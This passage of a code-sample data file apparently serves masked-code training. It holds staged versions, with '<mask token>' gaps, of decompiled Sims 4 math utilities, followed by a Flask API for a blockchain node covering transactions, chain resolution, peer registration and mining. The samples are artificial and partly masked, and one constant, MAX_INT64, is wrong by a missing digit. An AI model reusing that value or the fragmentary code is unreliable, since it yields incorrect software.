Operator.GREATER_OR_EQUAL\n\n @property\n def symbol(self):\n if self == Operator.GREATER:\n return '>'\n if self == Operator.GREATER_OR_EQUAL:\n return '>='\n if self == Operator.EQUAL:\n return '=='\n if self == Operator.NOTEQUAL:\n return '!='\n if self == Operator.LESS_OR_EQUAL:\n return '<='\n if self == Operator.LESS:\n return '<'\n\n @property\n def category(self):\n if self == Operator.GREATER:\n return Operator.GREATER\n if self == Operator.GREATER_OR_EQUAL:\n return Operator.GREATER\n if self == Operator.EQUAL:\n return Operator.EQUAL\n if self == Operator.NOTEQUAL:\n return Operator.EQUAL\n if self == Operator.LESS_OR_EQUAL:\n return Operator.LESS\n if self == Operator.LESS:\n return Operator.LESS\n\n\nclass InequalityOperator(enum.Int):\n __qualname__ = 'InequalityOperator'\n GREATER = Operator.GREATER\n GREATER_OR_EQUAL = Operator.GREATER_OR_EQUAL\n LESS_OR_EQUAL = Operator.LESS_OR_EQUAL\n LESS = Operator.LESS\n\n\n<mask token>\n\n\nclass Threshold:\n __qualname__ = 'Threshold'\n __slots__ = 'value', 'comparison'\n\n def __init__(self, value=None, comparison=None):\n self.value = value\n self.comparison = comparison\n\n def compare(self, source_value):\n if self.value is not None and self.comparison is not None:\n return self.comparison(source_value, self.value)\n return False\n\n def compare_value(self, source_value):\n if self.value is not None and self.comparison is not None:\n return self.comparison(source_value.value, self.value.value)\n return False\n\n def inverse(self):\n return Threshold(self.value, Operator.from_function(self.comparison\n ).inverse.function)\n\n def __str__(self):\n if self.comparison is None:\n return 'None'\n return '{} {}'.format(Operator.from_function(self.comparison).\n symbol, self.value)\n\n def __repr__(self):\n return '<Threshold {}>'.format(str(self))\n\n def __eq__(self, other):\n if not isinstance(other, Threshold):\n return False\n if not self.value == other.value:\n return False\n if not self.comparison == other.comparison:\n return False\n return True\n\n def __hash__(self):\n return hash((self.value, self.comparison))\n",
"step-4": "<mask token>\n\n\ndef clamp(lower_bound, x, upper_bound):\n if x < lower_bound:\n return lower_bound\n if x > upper_bound:\n return upper_bound\n return x\n\n\ndef interpolate(a, b, fraction):\n return a * fraction + (1 - fraction) * b\n\n\ndef linear_seq_gen(start, stop, step, max_count=None):\n delta = stop - start\n num = floor(abs(delta / step))\n if max_count is not None:\n num = min(num, max_count - 1)\n if num > 0:\n for i in range(0, num + 1):\n yield start + i * delta / num\n else:\n yield start\n if stop != start:\n yield stop\n\n\ndef deg_to_rad(deg):\n return deg * PI / 180\n\n\ndef rad_to_deg(rad):\n return rad * 180 / PI\n\n\ndef angle_abs_difference(a1, a2):\n delta = sims4.math.mod_2pi(a1 - a2)\n if delta > sims4.math.PI:\n delta = sims4.math.TWO_PI - delta\n return delta\n\n\n<mask token>\n\n\ndef vector_dot_2d(a, b):\n return a.x * b.x + a.z * b.z\n\n\ndef vector_cross(a, b):\n return Vector3(a.y * b.z - a.z * b.y, a.z * b.x - a.x * b.z, a.x * b.y -\n a.y * b.x)\n\n\ndef vector_cross_2d(a, b):\n return a.z * b.x - a.x * b.z\n\n\ndef vector_normalize(v):\n return v / v.magnitude()\n\n\ndef vector_flatten(v):\n return Vector3(v.x, 0, v.z)\n\n\ndef almost_equal(a, b, epsilon=EPSILON):\n return abs(a - b) < epsilon\n\n\n<mask token>\n\n\ndef transform_almost_equal(t1, t2, epsilon=EPSILON, epsilon_orientation=\n QUATERNION_EPSILON):\n if epsilon_orientation is DEFAULT:\n epsilon_orientation = epsilon\n return vector3_almost_equal(t1.translation, t2.translation, epsilon=epsilon\n ) and quaternion_almost_equal(t1.orientation, t2.orientation,\n epsilon=epsilon_orientation)\n\n\ndef transform_almost_equal_2d(t1, t2, epsilon=EPSILON, epsilon_orientation=\n QUATERNION_EPSILON):\n if epsilon_orientation is DEFAULT:\n epsilon_orientation = epsilon\n return vector3_almost_equal_2d(t1.translation, t2.translation, epsilon=\n epsilon) and quaternion_almost_equal(t1.orientation, t2.orientation,\n epsilon=epsilon_orientation)\n\n\ndef vector3_rotate_axis_angle(v, angle, axis):\n q = Quaternion.from_axis_angle(angle, axis)\n return q.transform_vector(v)\n\n\n<mask token>\n\n\ndef angle_to_yaw_quaternion(angle):\n return Quaternion.from_axis_angle(angle, UP_AXIS)\n\n\n<mask token>\n\n\ndef invert_quaternion(q):\n d = 1.0 / (q.x * q.x + q.y * q.y + q.z * q.z + q.w * q.w)\n return Quaternion(-d * q.x, -d * q.y, -d * q.z, d * q.w)\n\n\ndef get_difference_transform(transform_a, transform_b):\n v = transform_b.translation - transform_a.translation\n a_q_i = invert_quaternion(transform_a.orientation)\n q = Quaternion.concatenate(transform_b.orientation, a_q_i)\n v_prime = Quaternion.transform_vector(a_q_i, v)\n return Transform(v_prime, q)\n\n\nclass Location:\n __qualname__ = 'Location'\n __slots__ = ('transform', 'routing_surface', '_parent_ref',\n 'joint_name_or_hash', 'slot_hash')\n\n def __init__(self, transform, routing_surface, parent=None,\n joint_name_or_hash=None, slot_hash=0):\n self.transform = transform\n self.routing_surface = routing_surface\n self.parent = parent\n self.joint_name_or_hash = joint_name_or_hash\n self.slot_hash = slot_hash\n\n def __repr__(self):\n return standard_repr(self, self.transform, self.routing_surface,\n parent=self.parent, joint_name_or_hash=self.joint_name_or_hash,\n slot_hash=self.slot_hash)\n\n def __eq__(self, other):\n if type(self) is not type(other):\n return False\n if self.transform != other.transform:\n return False\n if self.parent != other.parent:\n return False\n if self.routing_surface != other.routing_surface:\n return False\n 
slot_hash0 = self.joint_name_or_hash or self.slot_hash\n slot_hash1 = other.joint_name_or_hash or other.slot_hash\n if slot_hash0 != slot_hash1:\n return False\n return True\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n @property\n def parent(self):\n if self._parent_ref is not None:\n return self._parent_ref()\n\n @parent.setter\n def parent(self, value):\n if value is not None:\n self._parent_ref = value.ref()\n self.routing_surface = None\n else:\n self._parent_ref = None\n\n @property\n def joint_name_hash(self):\n if self.joint_name_or_hash is None:\n return 0\n if isinstance(self.joint_name_or_hash, int):\n return self.joint_name_or_hash\n return sims4.hash_util.hash32(self.joint_name_or_hash)\n\n @property\n def world_routing_surface(self):\n if self.parent is not None:\n return self.parent.location.world_routing_surface\n return self.routing_surface\n\n @property\n def zone_id(self):\n if self.world_routing_surface.type == 1:\n return self.world_routing_surface.primary_id\n return sims4.zone_utils.get_zone_id()\n\n @property\n def level(self):\n return self.world_routing_surface.secondary_id\n\n @property\n def world_transform(self):\n if self.parent is None:\n return self.transform\n transform = self.transform\n parent = self.parent\n if parent.is_part:\n parent_transform = parent.part_owner.transform\n else:\n parent_transform = parent.transform\n if self.joint_name_or_hash is None:\n if transform is None:\n return parent_transform\n return sims4.math.Transform.concatenate(transform, parent_transform\n )\n joint_transform = native.animation.get_joint_transform_from_rig(self\n .parent.rig, self.joint_name_or_hash)\n if transform is None:\n return sims4.math.Transform.concatenate(joint_transform,\n parent_transform)\n local_transform = sims4.math.Transform.concatenate(transform,\n joint_transform)\n return sims4.math.Transform.concatenate(local_transform,\n parent_transform)\n\n def duplicate(self):\n return type(self)(self.transform, self.routing_surface, self.parent,\n self.joint_name_or_hash, self.slot_hash)\n\n def clone(self, *, transform=DEFAULT, translation=DEFAULT, orientation=\n DEFAULT, routing_surface=DEFAULT, parent=DEFAULT,\n joint_name_or_hash=DEFAULT, slot_hash=DEFAULT):\n if transform is DEFAULT:\n transform = self.transform\n if transform is not None:\n if translation is DEFAULT:\n translation = transform.translation\n if orientation is DEFAULT:\n orientation = transform.orientation\n transform = Transform(translation, orientation)\n if routing_surface is DEFAULT:\n routing_surface = self.routing_surface\n if parent is DEFAULT:\n parent = self.parent\n if joint_name_or_hash is DEFAULT:\n joint_name_or_hash = self.joint_name_or_hash\n if slot_hash is DEFAULT:\n slot_hash = self.slot_hash\n return type(self)(transform, routing_surface, parent,\n joint_name_or_hash, slot_hash)\n\n\nclass LinearCurve:\n __qualname__ = 'LinearCurve'\n __slots__ = 'points',\n\n def __init__(self, points):\n self.points = points\n self.points.sort(key=lambda i: i[0])\n\n def get(self, val):\n p_max = len(self.points) - 1\n if val <= self.points[0][0]:\n return self.points[0][1]\n if val >= self.points[p_max][0]:\n return self.points[p_max][1]\n i = p_max - 1\n while i > 0:\n while val < self.points[i][0]:\n i -= 1\n p1 = self.points[i]\n p2 = self.points[i + 1]\n percent = (val - p1[0]) / (p2[0] - p1[0])\n return (p2[1] - p1[1]) * percent + p1[1]\n\n\nclass WeightedUtilityCurve(LinearCurve):\n __qualname__ = 'WeightedUtilityCurve'\n\n def __init__(self, points, max_y=0, 
weight=1):\n if max_y == 0:\n max_y = self._find_largest_y(points)\n transformed_points = [(point[0], point[1] / max_y * weight) for\n point in points]\n super().__init__(transformed_points)\n\n def _find_largest_y(self, points):\n max_y = 0\n for point in points:\n while point[1] > max_y:\n max_y = point[1]\n return max_y\n\n\nclass CircularUtilityCurve(LinearCurve):\n __qualname__ = 'CircularUtilityCurve'\n\n def __init__(self, points, min_x, max_x):\n super().__init__(points)\n self._min_x = min_x\n self._max_x = max_x\n last_point = self.points[-1]\n distance_to_end = max_x - last_point[0]\n total_length = distance_to_end + self.points[0][1]\n distance_to_pivot_point = distance_to_end / total_length\n pivot_y_value = (self.points[0][1] - last_point[1]\n ) * distance_to_pivot_point + self.points[0][1]\n self.points.insert(0, (0, pivot_y_value))\n self.points.insert(len(self.points), (self._max_x, pivot_y_value))\n\n def get(self, val):\n return super().get(val)\n\n\nclass Operator(enum.Int):\n __qualname__ = 'Operator'\n GREATER = 1\n GREATER_OR_EQUAL = 2\n EQUAL = 3\n NOTEQUAL = 4\n LESS_OR_EQUAL = 5\n LESS = 6\n\n @staticmethod\n def from_function(fn):\n if fn == operator.gt:\n return Operator.GREATER\n if fn == operator.ge:\n return Operator.GREATER_OR_EQUAL\n if fn == operator.eq:\n return Operator.EQUAL\n if fn == operator.ne:\n return Operator.NOTEQUAL\n if fn == operator.le:\n return Operator.LESS_OR_EQUAL\n if fn == operator.lt:\n return Operator.LESS\n\n @property\n def function(self):\n if self.value == Operator.GREATER:\n return operator.gt\n if self.value == Operator.GREATER_OR_EQUAL:\n return operator.ge\n if self.value == Operator.EQUAL:\n return operator.eq\n if self.value == Operator.NOTEQUAL:\n return operator.ne\n if self.value == Operator.LESS_OR_EQUAL:\n return operator.le\n if self.value == Operator.LESS:\n return operator.lt\n\n @property\n def inverse(self):\n if self == Operator.GREATER:\n return Operator.LESS_OR_EQUAL\n if self == Operator.GREATER_OR_EQUAL:\n return Operator.LESS\n if self == Operator.EQUAL:\n return Operator.NOTEQUAL\n if self == Operator.NOTEQUAL:\n return Operator.EQUAL\n if self == Operator.LESS_OR_EQUAL:\n return Operator.GREATER\n if self == Operator.LESS:\n return Operator.GREATER_OR_EQUAL\n\n @property\n def symbol(self):\n if self == Operator.GREATER:\n return '>'\n if self == Operator.GREATER_OR_EQUAL:\n return '>='\n if self == Operator.EQUAL:\n return '=='\n if self == Operator.NOTEQUAL:\n return '!='\n if self == Operator.LESS_OR_EQUAL:\n return '<='\n if self == Operator.LESS:\n return '<'\n\n @property\n def category(self):\n if self == Operator.GREATER:\n return Operator.GREATER\n if self == Operator.GREATER_OR_EQUAL:\n return Operator.GREATER\n if self == Operator.EQUAL:\n return Operator.EQUAL\n if self == Operator.NOTEQUAL:\n return Operator.EQUAL\n if self == Operator.LESS_OR_EQUAL:\n return Operator.LESS\n if self == Operator.LESS:\n return Operator.LESS\n\n\nclass InequalityOperator(enum.Int):\n __qualname__ = 'InequalityOperator'\n GREATER = Operator.GREATER\n GREATER_OR_EQUAL = Operator.GREATER_OR_EQUAL\n LESS_OR_EQUAL = Operator.LESS_OR_EQUAL\n LESS = Operator.LESS\n\n\n<mask token>\n\n\nclass Threshold:\n __qualname__ = 'Threshold'\n __slots__ = 'value', 'comparison'\n\n def __init__(self, value=None, comparison=None):\n self.value = value\n self.comparison = comparison\n\n def compare(self, source_value):\n if self.value is not None and self.comparison is not None:\n return self.comparison(source_value, self.value)\n 
return False\n\n def compare_value(self, source_value):\n if self.value is not None and self.comparison is not None:\n return self.comparison(source_value.value, self.value.value)\n return False\n\n def inverse(self):\n return Threshold(self.value, Operator.from_function(self.comparison\n ).inverse.function)\n\n def __str__(self):\n if self.comparison is None:\n return 'None'\n return '{} {}'.format(Operator.from_function(self.comparison).\n symbol, self.value)\n\n def __repr__(self):\n return '<Threshold {}>'.format(str(self))\n\n def __eq__(self, other):\n if not isinstance(other, Threshold):\n return False\n if not self.value == other.value:\n return False\n if not self.comparison == other.comparison:\n return False\n return True\n\n def __hash__(self):\n return hash((self.value, self.comparison))\n",
"step-5": "from _math import Vector2, Vector3, Quaternion, Transform, Vector3Immutable, QuaternionImmutable, minimum_distance\nfrom _math import mod_2pi\nfrom math import pi as PI, sqrt, fmod, floor, atan2, acos, asin, ceil, pi, e\nimport operator\nfrom sims4.repr_utils import standard_repr\nimport enum\nimport native.animation\nimport sims4.hash_util\nfrom singletons import DEFAULT\nTWO_PI = PI*2\nEPSILON = 1.192092896e-07\nQUATERNION_EPSILON = 0.001\nMAX_FLOAT = 3.402823466e+38\nMAX_UINT64 = 18446744073709551615\nMAX_INT64 = 922337203685477580\nMAX_UINT32 = 4294967295\nMAX_INT32 = 2147483647\nMAX_UINT16 = 65535\nMAX_INT16 = 32767\nPOS_INFINITY = float('inf')\nNEG_INFINITY = float('-inf')\nFORWARD_AXIS = Vector3.Z_AXIS()\nUP_AXIS = Vector3.Y_AXIS()\n\ndef clamp(lower_bound, x, upper_bound):\n if x < lower_bound:\n return lower_bound\n if x > upper_bound:\n return upper_bound\n return x\n\ndef interpolate(a, b, fraction):\n return a*fraction + (1 - fraction)*b\n\ndef linear_seq_gen(start, stop, step, max_count=None):\n delta = stop - start\n num = floor(abs(delta/step))\n if max_count is not None:\n num = min(num, max_count - 1)\n if num > 0:\n for i in range(0, num + 1):\n yield start + i*delta/num\n else:\n yield start\n if stop != start:\n yield stop\n\ndef deg_to_rad(deg):\n return deg*PI/180\n\ndef rad_to_deg(rad):\n return rad*180/PI\n\ndef angle_abs_difference(a1, a2):\n delta = sims4.math.mod_2pi(a1 - a2)\n if delta > sims4.math.PI:\n delta = sims4.math.TWO_PI - delta\n return delta\n\ndef vector_dot(a, b):\n return a.x*b.x + a.y*b.y + a.z*b.z\n\ndef vector_dot_2d(a, b):\n return a.x*b.x + a.z*b.z\n\ndef vector_cross(a, b):\n return Vector3(a.y*b.z - a.z*b.y, a.z*b.x - a.x*b.z, a.x*b.y - a.y*b.x)\n\ndef vector_cross_2d(a, b):\n return a.z*b.x - a.x*b.z\n\ndef vector_normalize(v):\n return v/v.magnitude()\n\ndef vector_flatten(v):\n return Vector3(v.x, 0, v.z)\n\ndef almost_equal(a, b, epsilon=EPSILON):\n return abs(a - b) < epsilon\n\ndef vector3_almost_equal(v1, v2, epsilon=EPSILON):\n return abs(v1.x - v2.x) < epsilon and (abs(v1.y - v2.y) < epsilon and abs(v1.z - v2.z) < epsilon)\n\ndef vector3_almost_equal_2d(v1, v2, epsilon=EPSILON):\n return abs(v1.x - v2.x) < epsilon and abs(v1.z - v2.z) < epsilon\n\ndef quaternion_almost_equal(q1, q2, epsilon=QUATERNION_EPSILON):\n if abs(q1.x - q2.x) < epsilon and (abs(q1.y - q2.y) < epsilon and abs(q1.z - q2.z) < epsilon) and abs(q1.w - q2.w) < epsilon:\n return True\n if abs(q1.x + q2.x) < epsilon and (abs(q1.y + q2.y) < epsilon and abs(q1.z + q2.z) < epsilon) and abs(q1.w + q2.w) < epsilon:\n return True\n return False\n\ndef transform_almost_equal(t1, t2, epsilon=EPSILON, epsilon_orientation=QUATERNION_EPSILON):\n if epsilon_orientation is DEFAULT:\n epsilon_orientation = epsilon\n return vector3_almost_equal(t1.translation, t2.translation, epsilon=epsilon) and quaternion_almost_equal(t1.orientation, t2.orientation, epsilon=epsilon_orientation)\n\ndef transform_almost_equal_2d(t1, t2, epsilon=EPSILON, epsilon_orientation=QUATERNION_EPSILON):\n if epsilon_orientation is DEFAULT:\n epsilon_orientation = epsilon\n return vector3_almost_equal_2d(t1.translation, t2.translation, epsilon=epsilon) and quaternion_almost_equal(t1.orientation, t2.orientation, epsilon=epsilon_orientation)\n\ndef vector3_rotate_axis_angle(v, angle, axis):\n q = Quaternion.from_axis_angle(angle, axis)\n return q.transform_vector(v)\n\ndef vector3_angle(v):\n return atan2(v.x, v.z)\n\ndef angle_to_yaw_quaternion(angle):\n return Quaternion.from_axis_angle(angle, 
UP_AXIS)\n\ndef yaw_quaternion_to_angle(q):\n if almost_equal(q.y, 0.0):\n return 0\n angle = acos(q.w)*2.0\n if q.y > 0:\n return angle\n return -angle\n\ndef get_closest_point_2D(segment, p):\n a1 = segment[0]\n a2 = segment[1]\n (x1, x2) = (a1.x, a2.x)\n x3 = p.x\n (z1, z2) = (a1.z, a2.z)\n z3 = p.z\n dx = x2 - x1\n dz = z2 - z1\n t = ((x3 - x1)*dx + (z3 - z1)*dz)/(dx*dx + dz*dz)\n t = sims4.math.clamp(0, t, 1)\n x0 = x1 + t*dx\n z0 = z1 + t*dz\n return Vector3(x0, p.y, z0)\n\ndef invert_quaternion(q):\n d = 1.0/(q.x*q.x + q.y*q.y + q.z*q.z + q.w*q.w)\n return Quaternion(-d*q.x, -d*q.y, -d*q.z, d*q.w)\n\ndef get_difference_transform(transform_a, transform_b):\n v = transform_b.translation - transform_a.translation\n a_q_i = invert_quaternion(transform_a.orientation)\n q = Quaternion.concatenate(transform_b.orientation, a_q_i)\n v_prime = Quaternion.transform_vector(a_q_i, v)\n return Transform(v_prime, q)\n\nclass Location:\n __qualname__ = 'Location'\n __slots__ = ('transform', 'routing_surface', '_parent_ref', 'joint_name_or_hash', 'slot_hash')\n\n def __init__(self, transform, routing_surface, parent=None, joint_name_or_hash=None, slot_hash=0):\n self.transform = transform\n self.routing_surface = routing_surface\n self.parent = parent\n self.joint_name_or_hash = joint_name_or_hash\n self.slot_hash = slot_hash\n\n def __repr__(self):\n return standard_repr(self, self.transform, self.routing_surface, parent=self.parent, joint_name_or_hash=self.joint_name_or_hash, slot_hash=self.slot_hash)\n\n def __eq__(self, other):\n if type(self) is not type(other):\n return False\n if self.transform != other.transform:\n return False\n if self.parent != other.parent:\n return False\n if self.routing_surface != other.routing_surface:\n return False\n slot_hash0 = self.joint_name_or_hash or self.slot_hash\n slot_hash1 = other.joint_name_or_hash or other.slot_hash\n if slot_hash0 != slot_hash1:\n return False\n return True\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n @property\n def parent(self):\n if self._parent_ref is not None:\n return self._parent_ref()\n\n @parent.setter\n def parent(self, value):\n if value is not None:\n self._parent_ref = value.ref()\n self.routing_surface = None\n else:\n self._parent_ref = None\n\n @property\n def joint_name_hash(self):\n if self.joint_name_or_hash is None:\n return 0\n if isinstance(self.joint_name_or_hash, int):\n return self.joint_name_or_hash\n return sims4.hash_util.hash32(self.joint_name_or_hash)\n\n @property\n def world_routing_surface(self):\n if self.parent is not None:\n return self.parent.location.world_routing_surface\n return self.routing_surface\n\n @property\n def zone_id(self):\n if self.world_routing_surface.type == 1:\n return self.world_routing_surface.primary_id\n return sims4.zone_utils.get_zone_id()\n\n @property\n def level(self):\n return self.world_routing_surface.secondary_id\n\n @property\n def world_transform(self):\n if self.parent is None:\n return self.transform\n transform = self.transform\n parent = self.parent\n if parent.is_part:\n parent_transform = parent.part_owner.transform\n else:\n parent_transform = parent.transform\n if self.joint_name_or_hash is None:\n if transform is None:\n return parent_transform\n return sims4.math.Transform.concatenate(transform, parent_transform)\n joint_transform = native.animation.get_joint_transform_from_rig(self.parent.rig, self.joint_name_or_hash)\n if transform is None:\n return sims4.math.Transform.concatenate(joint_transform, parent_transform)\n local_transform 
= sims4.math.Transform.concatenate(transform, joint_transform)\n return sims4.math.Transform.concatenate(local_transform, parent_transform)\n\n def duplicate(self):\n return type(self)(self.transform, self.routing_surface, self.parent, self.joint_name_or_hash, self.slot_hash)\n\n def clone(self, *, transform=DEFAULT, translation=DEFAULT, orientation=DEFAULT, routing_surface=DEFAULT, parent=DEFAULT, joint_name_or_hash=DEFAULT, slot_hash=DEFAULT):\n if transform is DEFAULT:\n transform = self.transform\n if transform is not None:\n if translation is DEFAULT:\n translation = transform.translation\n if orientation is DEFAULT:\n orientation = transform.orientation\n transform = Transform(translation, orientation)\n if routing_surface is DEFAULT:\n routing_surface = self.routing_surface\n if parent is DEFAULT:\n parent = self.parent\n if joint_name_or_hash is DEFAULT:\n joint_name_or_hash = self.joint_name_or_hash\n if slot_hash is DEFAULT:\n slot_hash = self.slot_hash\n return type(self)(transform, routing_surface, parent, joint_name_or_hash, slot_hash)\n\nclass LinearCurve:\n __qualname__ = 'LinearCurve'\n __slots__ = ('points',)\n\n def __init__(self, points):\n self.points = points\n self.points.sort(key=lambda i: i[0])\n\n def get(self, val):\n p_max = len(self.points) - 1\n if val <= self.points[0][0]:\n return self.points[0][1]\n if val >= self.points[p_max][0]:\n return self.points[p_max][1]\n i = p_max - 1\n while i > 0:\n while val < self.points[i][0]:\n i -= 1\n p1 = self.points[i]\n p2 = self.points[i + 1]\n percent = (val - p1[0])/(p2[0] - p1[0])\n return (p2[1] - p1[1])*percent + p1[1]\n\nclass WeightedUtilityCurve(LinearCurve):\n __qualname__ = 'WeightedUtilityCurve'\n\n def __init__(self, points, max_y=0, weight=1):\n if max_y == 0:\n max_y = self._find_largest_y(points)\n transformed_points = [(point[0], point[1]/max_y*weight) for point in points]\n super().__init__(transformed_points)\n\n def _find_largest_y(self, points):\n max_y = 0\n for point in points:\n while point[1] > max_y:\n max_y = point[1]\n return max_y\n\nclass CircularUtilityCurve(LinearCurve):\n __qualname__ = 'CircularUtilityCurve'\n\n def __init__(self, points, min_x, max_x):\n super().__init__(points)\n self._min_x = min_x\n self._max_x = max_x\n last_point = self.points[-1]\n distance_to_end = max_x - last_point[0]\n total_length = distance_to_end + self.points[0][1]\n distance_to_pivot_point = distance_to_end/total_length\n pivot_y_value = (self.points[0][1] - last_point[1])*distance_to_pivot_point + self.points[0][1]\n self.points.insert(0, (0, pivot_y_value))\n self.points.insert(len(self.points), (self._max_x, pivot_y_value))\n\n def get(self, val):\n return super().get(val)\n\nclass Operator(enum.Int):\n __qualname__ = 'Operator'\n GREATER = 1\n GREATER_OR_EQUAL = 2\n EQUAL = 3\n NOTEQUAL = 4\n LESS_OR_EQUAL = 5\n LESS = 6\n\n @staticmethod\n def from_function(fn):\n if fn == operator.gt:\n return Operator.GREATER\n if fn == operator.ge:\n return Operator.GREATER_OR_EQUAL\n if fn == operator.eq:\n return Operator.EQUAL\n if fn == operator.ne:\n return Operator.NOTEQUAL\n if fn == operator.le:\n return Operator.LESS_OR_EQUAL\n if fn == operator.lt:\n return Operator.LESS\n\n @property\n def function(self):\n if self.value == Operator.GREATER:\n return operator.gt\n if self.value == Operator.GREATER_OR_EQUAL:\n return operator.ge\n if self.value == Operator.EQUAL:\n return operator.eq\n if self.value == Operator.NOTEQUAL:\n return operator.ne\n if self.value == Operator.LESS_OR_EQUAL:\n return 
operator.le\n if self.value == Operator.LESS:\n return operator.lt\n\n @property\n def inverse(self):\n if self == Operator.GREATER:\n return Operator.LESS_OR_EQUAL\n if self == Operator.GREATER_OR_EQUAL:\n return Operator.LESS\n if self == Operator.EQUAL:\n return Operator.NOTEQUAL\n if self == Operator.NOTEQUAL:\n return Operator.EQUAL\n if self == Operator.LESS_OR_EQUAL:\n return Operator.GREATER\n if self == Operator.LESS:\n return Operator.GREATER_OR_EQUAL\n\n @property\n def symbol(self):\n if self == Operator.GREATER:\n return '>'\n if self == Operator.GREATER_OR_EQUAL:\n return '>='\n if self == Operator.EQUAL:\n return '=='\n if self == Operator.NOTEQUAL:\n return '!='\n if self == Operator.LESS_OR_EQUAL:\n return '<='\n if self == Operator.LESS:\n return '<'\n\n @property\n def category(self):\n if self == Operator.GREATER:\n return Operator.GREATER\n if self == Operator.GREATER_OR_EQUAL:\n return Operator.GREATER\n if self == Operator.EQUAL:\n return Operator.EQUAL\n if self == Operator.NOTEQUAL:\n return Operator.EQUAL\n if self == Operator.LESS_OR_EQUAL:\n return Operator.LESS\n if self == Operator.LESS:\n return Operator.LESS\n\nclass InequalityOperator(enum.Int):\n __qualname__ = 'InequalityOperator'\n GREATER = Operator.GREATER\n GREATER_OR_EQUAL = Operator.GREATER_OR_EQUAL\n LESS_OR_EQUAL = Operator.LESS_OR_EQUAL\n LESS = Operator.LESS\n\nwith InequalityOperator.__reload_context__(InequalityOperator, InequalityOperator):\n InequalityOperator.from_function = Operator.from_function\n InequalityOperator.function = Operator.function\n InequalityOperator.inverse = Operator.inverse\n InequalityOperator.symbol = Operator.symbol\n InequalityOperator.category = Operator.category\n\nclass Threshold:\n __qualname__ = 'Threshold'\n __slots__ = ('value', 'comparison')\n\n def __init__(self, value=None, comparison=None):\n self.value = value\n self.comparison = comparison\n\n def compare(self, source_value):\n if self.value is not None and self.comparison is not None:\n return self.comparison(source_value, self.value)\n return False\n\n def compare_value(self, source_value):\n if self.value is not None and self.comparison is not None:\n return self.comparison(source_value.value, self.value.value)\n return False\n\n def inverse(self):\n return Threshold(self.value, Operator.from_function(self.comparison).inverse.function)\n\n def __str__(self):\n if self.comparison is None:\n return 'None'\n return '{} {}'.format(Operator.from_function(self.comparison).symbol, self.value)\n\n def __repr__(self):\n return '<Threshold {}>'.format(str(self))\n\n def __eq__(self, other):\n if not isinstance(other, Threshold):\n return False\n if not self.value == other.value:\n return False\n if not self.comparison == other.comparison:\n return False\n return True\n\n def __hash__(self):\n return hash((self.value, self.comparison))\n\n",
"step-ids": [
52,
53,
55,
64,
75
]
}
|
[
52,
53,
55,
64,
75
] |
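The record above closes with a set of geometry and utility-curve helpers (quaternion yaw extraction, closest point on a 2D segment, the piecewise-linear LinearCurve, and Operator/Threshold comparisons). As a quick illustration of the interpolation those curves perform, here is a minimal standalone sketch in plain Python; it does not use the game's sims4 modules, and the sample points are invented for illustration:

# Minimal sketch of piecewise-linear interpolation over sorted (x, y) points,
# mirroring the LinearCurve.get behaviour described in the record above.
def curve_get(points, val):
    points = sorted(points)
    if val <= points[0][0]:
        return points[0][1]
    if val >= points[-1][0]:
        return points[-1][1]
    # find the segment containing val, then interpolate linearly within it
    for (x1, y1), (x2, y2) in zip(points, points[1:]):
        if x1 <= val <= x2:
            t = (val - x1) / (x2 - x1)
            return y1 + t * (y2 - y1)

print(curve_get([(0.0, 0.0), (0.5, 2.0), (1.0, 3.0)], 0.75))  # 2.5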
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, request, jsonify
from app import Node
from dbm2 import filemanager
fm = filemanager()
node = Node(fm)
app = Flask(__name__)
@app.route("/transactions/isfull",methods=['GET'])
def isFull():
return jsonify(node.isFull()), 200
@app.route("/transactions/new",methods=["POST"])
def newTransaction():
transaction = request.get_json()
if node.isValidTxn(node.isValidChain(),transaction):
return transaction, 200
else:
return jsonify(False), 200
@app.route("/chain/last",methods=["GET"])
def last_block():
return jsonify(node.getLastBlock()), 200
@app.route("/chain",methods=["GET"])
def get_chain():
return jsonify(node.chain), 200
@app.route("/pnodes/register",methods=["POST"])
def register_pnodes():
nodes = request.get_json()
print(nodes)
if type(nodes)==list:
if len(nodes)>10 and nodes!=[]:
nodes = nodes[:10]
s = [] #succeed
f = [] #failed
for addr in nodes:
if node.addPNode(addr):
s.append(addr)
else:
f.append(addr)
resp = {"Added PNodes":s,
"Not added pnodes":f}
return jsonify(resp), 200
resp = {"Error":"Input format error"}
return jsonify(resp), 400
@app.route("/pnodes/size",methods=["GET"])
def pnodes_size():
return jsonify(len(node.pnodes)), 200
@app.route("/nodes",methods=["GET"])
def get_nodes():
nodes = list(node.nodes)
return jsonify(nodes), 200
@app.route("/nodes/resolve",methods=["GET"])
def resolve_nodes():
added_nodes = node.resolveNodes()
if added_nodes:
return jsonify(added_nodes), 200
else:
return "0 nodes added",400
@app.route("/chain/resolve",methods=["GET"])
def resolve_chain():
r = node.resolveConflicts()
if r:
return jsonify(r), 200
else:
print("Nothing")
return jsonify(r), 400
@app.route("/mine",methods=["GET"])
def mine():
mb = node.mine()
resp = {"Mined_block":mb}
return jsonify(resp), 200
if __name__=="__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-p","--port",default=node.DEFAULT_PORT,type=int,help='port to listen on')
args = parser.parse_args()
port = args.port
node.port=port
app.run(host="",port=port)
|
normal
|
{
"blob_id": "45b46a08d8b304ac12baf34e0916b249b560418f",
"index": 7459,
"step-1": "<mask token>\n\n\[email protected]('/transactions/isfull', methods=['GET'])\ndef isFull():\n return jsonify(node.isFull()), 200\n\n\[email protected]('/transactions/new', methods=['POST'])\ndef newTransaction():\n transaction = request.get_json()\n if node.isValidTxn(node.isValidChain(), transaction):\n return transaction, 200\n else:\n return jsonify(False), 200\n\n\n<mask token>\n\n\[email protected]('/chain', methods=['GET'])\ndef get_chain():\n return jsonify(node.chain), 200\n\n\[email protected]('/pnodes/register', methods=['POST'])\ndef register_pnodes():\n nodes = request.get_json()\n print(nodes)\n if type(nodes) == list:\n if len(nodes) > 10 and nodes != []:\n nodes = nodes[:10]\n s = []\n f = []\n for addr in nodes:\n if node.addPNode(addr):\n s.append(addr)\n else:\n f.append(addr)\n resp = {'Added PNodes': s, 'Not added pnodes': f}\n return jsonify(resp), 200\n resp = {'Error': 'Input format error'}\n return jsonify(resp), 400\n\n\[email protected]('/pnodes/size', methods=['GET'])\ndef pnodes_size():\n return jsonify(len(node.pnodes)), 200\n\n\[email protected]('/nodes', methods=['GET'])\ndef get_nodes():\n nodes = list(node.nodes)\n return jsonify(nodes), 200\n\n\n<mask token>\n\n\[email protected]('/chain/resolve', methods=['GET'])\ndef 